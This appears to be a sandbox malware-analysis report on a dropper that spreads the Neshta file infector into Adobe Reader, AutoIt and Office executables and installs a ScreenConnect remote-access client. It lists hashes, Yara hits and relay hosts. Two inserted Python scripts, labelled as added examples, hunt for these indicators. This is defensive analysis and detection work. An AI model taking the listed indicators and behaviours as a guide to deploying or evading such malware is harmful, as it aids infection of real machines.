C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe | 100% | Avira | W32/Neshta.A
C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Joe Sandbox ML |
C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Uninstall.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe | 100% | Joe Sandbox ML |
C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | 96% | ReversingLabs | Win32.Virus.Neshta
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | 96% | ReversingLabs | Win32.Virus.Neshta
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | 96% | ReversingLabs | Win32.Virus.Neshta

                          Unpacked PE Files

Source | Detection | Scanner | Label
2.2.svchost.com.400000.0.unpack | 100% | Avira | W32/Neshta.A
0.0.$RUX313H.exe.400000.0.unpack | 100% | Avira | W32/Neshta.A
0.2.$RUX313H.exe.400000.0.unpack | 100% | Avira | W32/Neshta.A
2.0.svchost.com.400000.0.unpack | 100% | Avira | W32/Neshta.A

                          Domains

                          No Antivirus matches

                          URLs

                          No Antivirus matches

                          Domains and IPs

                          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
server-nixce85832f-relay.screenconnect.com | 145.40.105.136 | true | false | | high
instance-qchhoo-relay.screenconnect.com | unknown | unknown | false | | high

                              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://feedback.screenconnect.com/Feedback.axd | $RUX313H.exe, 00000001.00000000.663879724.0000000000E02000.00000002.00020000.sdmp, ScreenConnect.ClientService.exe | false | - | high

                                Contacted IPs

(World map of contacted IPs not reproduced here; its legend shades countries by share of contacted IPs in four bands: below 25%, 25% to 50%, 50% to 75%, above 75%.)

                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
145.40.105.136 | server-nixce85832f-relay.screenconnect.com | Netherlands | 34108 | BREEDBANDDELFTNL | false

                                Private

                                IP
                                192.168.2.1
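The two relay hostnames, the resolved relay IP and the feedback URL above are the only network indicators this run produced. The following script is an added example, not part of the report, showing how a responder would sweep DNS logs for them. It assumes a constructed log format of "time client qname answer" per line (the sample lines are made up for the example) and generalizes the two relay names into the pattern "*-relay.screenconnect.com", which is an assumption beyond what the report shows; the vendor's own site (www.screenconnect.com) is deliberately left unmatched.

```python
"""Flag ScreenConnect relay traffic in DNS logs (added example, not from the report).

Indicators come from the "Contacted Domains" and "Contacted IPs" tables above.
The log format and the sample lines are constructed for this example.
"""
import ipaddress
import re
from typing import List, Optional, Tuple

# Exact indicators from the report.
RELAY_HOSTS = {
    "server-nixce85832f-relay.screenconnect.com",
    "instance-qchhoo-relay.screenconnect.com",
}
RELAY_IPS = {ipaddress.ip_address("145.40.105.136")}
FEEDBACK_URL = "https://feedback.screenconnect.com/Feedback.axd"

# Assumption (generalization): any host ending in -relay.screenconnect.com is a
# ScreenConnect cloud relay, not only the two observed in this run.
RELAY_PATTERN = re.compile(r"^[a-z0-9-]+-relay\.screenconnect\.com$", re.IGNORECASE)

# Constructed sample log: "<time> <client> <qname> <answer>" per line.
SAMPLE_DNS_LOG = """\
21:51:02 192.168.2.3 server-nixce85832f-relay.screenconnect.com 145.40.105.136
21:51:05 192.168.2.3 ctldl.windowsupdate.com 23.0.174.185
21:52:10 192.168.2.7 instance-qchhoo-relay.screenconnect.com NXDOMAIN
21:52:41 192.168.2.9 www.screenconnect.com 198.51.100.10
"""


def classify_query(qname: str, answer: str) -> Optional[str]:
    """Return the indicator class for one DNS record, or None if it is clean.

    Strongest evidence first: an exact hostname or IP from the report beats
    the weaker suffix pattern, so the verdict names the best match available.
    """
    host = qname.rstrip(".").lower()
    if host in RELAY_HOSTS:
        return "known-relay-host"
    try:
        if ipaddress.ip_address(answer) in RELAY_IPS:
            return "known-relay-ip"
    except ValueError:
        pass  # NXDOMAIN, SERVFAIL or any other non-address answer
    if RELAY_PATTERN.match(host):
        return "relay-pattern"
    return None


def scan_dns_log(text: str) -> List[Tuple[str, str, str]]:
    """Return (client, qname, reason) for every log line that hits an indicator."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # malformed line: skip rather than abort the whole sweep
        _time, client, qname, answer = parts
        reason = classify_query(qname, answer)
        if reason:
            hits.append((client, qname, reason))
    return hits


if __name__ == "__main__":
    for client, qname, reason in scan_dns_log(SAMPLE_DNS_LOG):
        print(f"{client} -> {qname} [{reason}]")
```

A relay hit only proves that a ScreenConnect client on that host reached the vendor's cloud; ScreenConnect is a legitimate remote-access product, so the finding has to be weighed against whether the tool is sanctioned on that machine. In this run it is the combination with an unsigned dropper and the Neshta file infection that makes the relay traffic worth acting on.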

                                General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 495328
Start date: 01.10.2021
Start time: 21:50:26
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 14m 51s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: $RUX313H.exe
Cookbook file name: defaultwindowsfilecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.spre.spyw.evad.winEXE@22/143@11/2
                                EGA Information:
                                • Successful, ratio: 83.3%
                                HDC Information:
                                • Successful, ratio: 23.8% (good quality ratio 22.6%)
                                • Quality average: 80.9%
                                • Quality standard deviation: 28.5%
                                HCA Information:
                                • Successful, ratio: 63%
                                • Number of executed functions: 295
                                • Number of non-executed functions: 71
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240s for rundll32
                                Warnings:
                                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
                                • Excluded IPs from analysis (whitelisted): 20.82.209.183, 23.0.174.185, 23.0.174.200, 20.54.110.249, 40.112.88.60, 23.10.249.26, 23.10.249.43
                                • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                • Execution Graph export aborted for target rundll32.exe, PID 5384 because it is empty
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtCreateFile calls found.
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtOpenFile calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.

                                Simulations

                                Behavior and APIs

Time | Type | Description
21:53:08 | API Interceptor | 10x Sleep call for process: svchost.exe modified

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASN

Match: BREEDBANDDELFTNL
Associated Sample Name / URL | Detection | Context (IP in this ASN)
index_2021-09-30-12_54 | malicious | 145.32.220.170
L3Gl0GugHo | malicious | 145.41.224.160
XyMjGu74RX | malicious | 145.40.82.201
nogBoEEoTK | malicious | 145.42.28.16
re2.arm7 | malicious | 145.32.202.100
OyGRw8uet6 | malicious | 145.42.40.205
2JOGBbciho | malicious | 145.43.209.253
N2fpnW8P5q | malicious | 145.43.209.255
nRDfZEGYCV | malicious | 145.40.113.16
x3rccmpLIx | malicious | 145.32.114.156
ryp5LWcSA8 | malicious | 145.42.220.224
DgPSz8yXHm | malicious | 145.41.118.138
FTFGYpE43O | malicious | 145.41.118.150
fN3J4l8kpE | malicious | 145.36.121.253
XhEdLIc8Vn | malicious | 145.41.118.193
i | malicious | 95.128.93.242

                                JA3 Fingerprints

                                No context

                                Dropped Files

Match: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe
Associated Sample Name / URL | Detection
HYmN4qwdBc.exe | malicious
Z68mMCAxFZ.exe | malicious
Yy788lmJnh.exe | malicious
0yt33vmRtD.exe | malicious
6LkjS4JhAl.exe | malicious
09876523456789.exe | malicious
Y4pMlX1fO2.exe | malicious
B513104971C9E0C5B6721A523C9475701A67BB368A74F.exe | malicious
1J5sT000kJ.exe | malicious
ij99opH1kI.exe | malicious
McAfeeStingerPortable.exe | malicious
javaw.exe | malicious
javaw.exe | malicious
Lw6h2Z5Lg5.exe | malicious
Shipping documentsProforma invoice.exe | malicious
je60o4s3gS.exe | malicious
8doUcc9Dn2.exe | malicious
y9pE5n5u9D.exe | malicious
wVdurpHHFa.exe | malicious
smHWkWDwfX.exe | malicious

                                                                        Created / dropped Files

C:\Config.Msi\5e0b04.rbs
Process: C:\Windows\System32\msiexec.exe
File Type: data
Category: modified
Size (bytes): 217235
Entropy (8bit): 6.580686724845479
Encrypted: false
SSDEEP: 3072:QT9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMGl:QTuH2aCGw1ST1wQLdqvl
MD5: 6500D17990C070DDA633CB7D1299A94D
SHA1: C2AFBBEA442FD91643DBC1CD665A370CE89240FC
SHA-256: 757F61C46E7A082B8489BF79F3D1B5185B71BA43ACF36425C544997AA17802DD
SHA-512: 510395E3854F77EA23FE9A2D8795E651AF91AE50546718D36D78CD18BCE52BFF65520DFCD1BF8A22940B52EA701BE4B4E0083F751A2998218ABE7B9D8697A4FE
Malicious: false
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\5e0b04.rbs, Author: Joe Security
                                                                        Preview: ...@IXOS.@.....@..AS.@.....@.....@.....@.....@.....@......&.{88CF3F24-93A2-493E-BA63-1D8CC976DBBA}'.ScreenConnect Client (77af187dd37f08fd)..setup.msi.@.....@Qb...@.....@......DefaultIcon..&.{9C0A6111-B899-49EE-9A79-EF61274BA5E5}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (77af187dd37f08fd)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{4768BE46-975A-455C-AF15-61A15FE629A4}&.{88CF3F24-93A2-493E-BA63-1D8CC976DBBA}.@......&.{6DCE5A21-0DC7-4711-A8DC-2DDE062B4424}&.{88CF3F24-93A2-493E-BA63-1D8CC976DBBA}.@......&.{4131B28B-C591-485C-81BB-59C107C8780A}&.{88CF3F24-93A2-493E-BA63-1D8CC976DBBA}.@......&.{65DC5071-7A1F-4E32-8C11-DC3D60C6921B}&.{88CF3F24-93A2-493E-BA63-1D8CC976DBBA}.@........StopServices..Stopping services..Service: [1]....CreateFolders..Creating folders..Folder: [1]#.7.C:\ProgramData\ScreenConnect Client (77af187dd37f08fd)\.@........InstallFil
C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe
Process: C:\Users\user\Desktop\$RUX313H.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.278258254187173
Encrypted: false
SSDEEP: 1536:JxqjQ+P04wsmJCctJ77qzWk6AM2oS/xePB:sr85CctdeKzC/y
MD5: E47F8A2ECDC2D4BFBBB6328B1391F1CC
SHA1: A633C3106A89C083014FC9F29D559B70E93D6D69
SHA-256: 8FCB4C541BDDA7D5CDA8124B48BECBAFBAFE2D82116BD6356D16FF894E1D83AD
SHA-512: 6A9088AA04F3BC6F57AAFDAC45B3C52A0668431CA373BA6E8C034717FEE10BE90B2E7F806178A26151D040B3087F708A08219AAC3B2F4553AA5D84E36BE86EC6
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, Author: Florian Roth
• Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:
• Filename: HYmN4qwdBc.exe, Detection: malicious
• Filename: Z68mMCAxFZ.exe, Detection: malicious
• Filename: Yy788lmJnh.exe, Detection: malicious
• Filename: 0yt33vmRtD.exe, Detection: malicious
• Filename: 6LkjS4JhAl.exe, Detection: malicious
• Filename: 09876523456789.exe, Detection: malicious
• Filename: Y4pMlX1fO2.exe, Detection: malicious
• Filename: B513104971C9E0C5B6721A523C9475701A67BB368A74F.exe, Detection: malicious
• Filename: 1J5sT000kJ.exe, Detection: malicious
• Filename: ij99opH1kI.exe, Detection: malicious
• Filename: McAfeeStingerPortable.exe, Detection: malicious
• Filename: javaw.exe, Detection: malicious
• Filename: javaw.exe, Detection: malicious
• Filename: Lw6h2Z5Lg5.exe, Detection: malicious
• Filename: Shipping documentsProforma invoice.exe, Detection: malicious
• Filename: je60o4s3gS.exe, Detection: malicious
• Filename: 8doUcc9Dn2.exe, Detection: malicious
• Filename: y9pE5n5u9D.exe, Detection: malicious
• Filename: wVdurpHHFa.exe, Detection: malicious
• Filename: smHWkWDwfX.exe, Detection: malicious
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe
Process: C:\Users\user\Desktop\$RUX313H.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.3372362912074625
Encrypted: false
SSDEEP: 1536:JxqjQ+P04wsmJCpbQILFkbeumIkA39xSZW175V7UZQx:sr85Cp8LRkgUA1nQZs
MD5: 10075707D5C79CDACFE09DEF9C6D4985
SHA1: 7D1DD5FB7DBBCC8563911BDB3C40B244FD03C634
SHA-256: 3D49D6B3360EB03FDD43A4C926213F8B348ABEDE3A5D8B7A4530BF8ED4AE1B72
SHA-512: C31030085A5D2C15DCE1B9B5EA1727CF36CC4F3AC71A5F5715086342669D9E3E2D0BA213ECC00D9A18D792122332BB6DF2EE05B146CA83AF279E3C4CE80B821D
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Author: Florian Roth
• Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Process: C:\Users\user\Desktop\$RUX313H.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.220006974675465
Encrypted: false
SSDEEP: 1536:JxqjQ+P04wsmJCbO/DiMgT0O8ahUMJD/dt7:sr85CSPm8aVJD37
MD5: F447C4B446D5889225A9D9082145AD88
SHA1: A1A380F3D3402F243E1A213C39E969D2C24CA99E
SHA-256: C34D1F919C306D2F2959C932CAC15FBED433AD465F71C50270DA27803952B829
SHA-512: E62F7E4F3E7EDE368CA0ECB242BF9AD12124AE92A61AF9BD97CA47E1457B842D84BC16105EE84EC201B948C31E613046F92DA4635EF2061638BD40EC797435AB
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, Author: Florian Roth
• Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 96%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
Process: C:\Users\user\Desktop\$RUX313H.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.356945716242827
Encrypted: false
SSDEEP: 1536:JxqjQ+P04wsmJC8xXHWVxZs58xP3RFA+8j/Em8kjkO:sr85CHVxZo8xP3RFA+m/Em8St
MD5: DE64003856A8B74AEAF33E247AF9424B
SHA1: 912E6F9C6B1103AAFEC7F30FE3B0F9C3F55D6650
SHA-256: A39859FB4CB6693CDB686B3501C0178DFF81D27375C0086805F09ABF45284F64
SHA-512: 4D2B92577F21183B5BF72DDA2DA4750099F198AA086FD68DDCCB43C686E1A8949E834E72D8E7FEAC05DA4F080D54C12BC1A7A5E2DEE36DFF3B92A4931BF1FE8D
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, Author: Florian Roth
• Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 96%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
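The five dropped executables detailed in this section share the same profile: 82944 bytes, PE32, a DOS stub that begins with "MZP" and carries the Borland message "This program must be run under Win32", and a unique SHA-256 each. The script below is an added example, not part of the report or of any detection product, showing how a responder would hunt for them on other hosts. The SHA-256 values are copied from the entries above; the structural check is derived from the previews and is deliberately weak, because the "MZP" stub appears in every Delphi-built program, so it only produces leads while a hash hit is a confirmed match. Function names and the constructed sample files are the example's own.

```python
"""Hunt for the Neshta-infected executables listed in this report (added example).

Hash IOCs are copied from the "Created / dropped Files" entries above. The
size and stub heuristics come from the previews of the same entries and are
leads only; every Delphi binary starts with "MZP" and the Borland stub text.
"""
import hashlib
import os
from typing import Dict, List, Optional, Tuple

# SHA-256 of the infected files dropped into MSOCache and Acrobat Reader.
NESHTA_SHA256 = {
    "8FCB4C541BDDA7D5CDA8124B48BECBAFBAFE2D82116BD6356D16FF894E1D83AD",  # ose.exe
    "3D49D6B3360EB03FDD43A4C926213F8B348ABEDE3A5D8B7A4530BF8ED4AE1B72",  # setup.exe
    "C34D1F919C306D2F2959C932CAC15FBED433AD465F71C50270DA27803952B829",  # ADelRCP.exe
    "A39859FB4CB6693CDB686B3501C0178DFF81D27375C0086805F09ABF45284F64",  # AcroBroker.exe
    "8E0F471BC8BAEBB5FBC3C65A9C6C75B3F23B4E94AC4C07054DAD643CEBDCA103",  # RdrCEF.exe
}
INFECTED_SIZE = 82944                                   # size of every dropped file above
BORLAND_STUB = b"This program must be run under Win32"  # DOS stub text from the previews


def sha256_hex(data: bytes) -> str:
    """Upper-case SHA-256 hex digest, matching the report's formatting."""
    return hashlib.sha256(data).hexdigest().upper()


def classify(data: bytes, iocs=NESHTA_SHA256) -> Optional[str]:
    """Return 'hash-match', 'heuristic' or None for one file's contents."""
    if sha256_hex(data) in iocs:
        return "hash-match"
    # Weak structural lead: Delphi stub marker plus the exact dropped-file size.
    has_delphi_stub = data[:3] == b"MZP" and BORLAND_STUB in data[:0x100]
    if has_delphi_stub and len(data) == INFECTED_SIZE:
        return "heuristic"
    return None


def scan_tree(root: str, iocs=NESHTA_SHA256) -> List[Tuple[str, str]]:
    """Walk a directory tree and return (path, verdict) for every suspicious .exe."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".exe"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # locked or unreadable file: skip, keep sweeping
            verdict = classify(data, iocs)
            if verdict:
                findings.append((path, verdict))
    return findings


def scan_samples(samples: Dict[str, bytes], iocs=NESHTA_SHA256) -> Dict[str, Optional[str]]:
    """Same classification over in-memory files, used for the offline demo."""
    return {name: classify(data, iocs) for name, data in samples.items()}


def fake_delphi_pe(size: int) -> bytes:
    """Constructed stand-in (not real malware): MZP header plus the Borland stub, padded."""
    header = b"MZP" + b"\x00" * 0x40 + BORLAND_STUB
    return header + b"\x00" * (size - len(header))


if __name__ == "__main__":
    # Constructed inputs: one file shaped like the dropper, one ordinary PE.
    samples = {
        "ADelRCP.exe": fake_delphi_pe(INFECTED_SIZE),
        "calc.exe": b"MZ" + b"\x00" * 1024,
    }
    for name, verdict in scan_samples(samples).items():
        print(f"{name}: {verdict}")
```

On a live host, run scan_tree over the directories the report shows being written to (C:\MSOCache, C:\Program Files (x86)\Adobe, the AutoIt3 and Java Update folders) and treat every hash match as confirmed infection; a heuristic verdict on a file that is not one of those paths needs a second look with the Yara rules named in the entries before it is acted on.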
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Process: C:\Users\user\Desktop\$RUX313H.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.486359083061706
Encrypted: false
SSDEEP: 768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJw0L11g2ncA7932EDoh3hG2xS79o5kUt:JxqjQ+P04wsmJCt2ce3ExA89/I+b
MD5: D972E8BC4F221D69D9DF89999B74C311
SHA1: 3A43D069389EFDBA178DCF16EBF4A45A8B09F0F9
SHA-256: 8E0F471BC8BAEBB5FBC3C65A9C6C75B3F23B4E94AC4C07054DAD643CEBDCA103
SHA-512: DDA8C29088E907E0B429E560CC21FD2B5C7EF0736456A30BAA3FF08AC85C73487471E6164CE8872AFA7E7B8604AE6A5882A748140B4ADBA142EBB0CC6560E7B6
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, Author: Florian Roth
• Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 96%
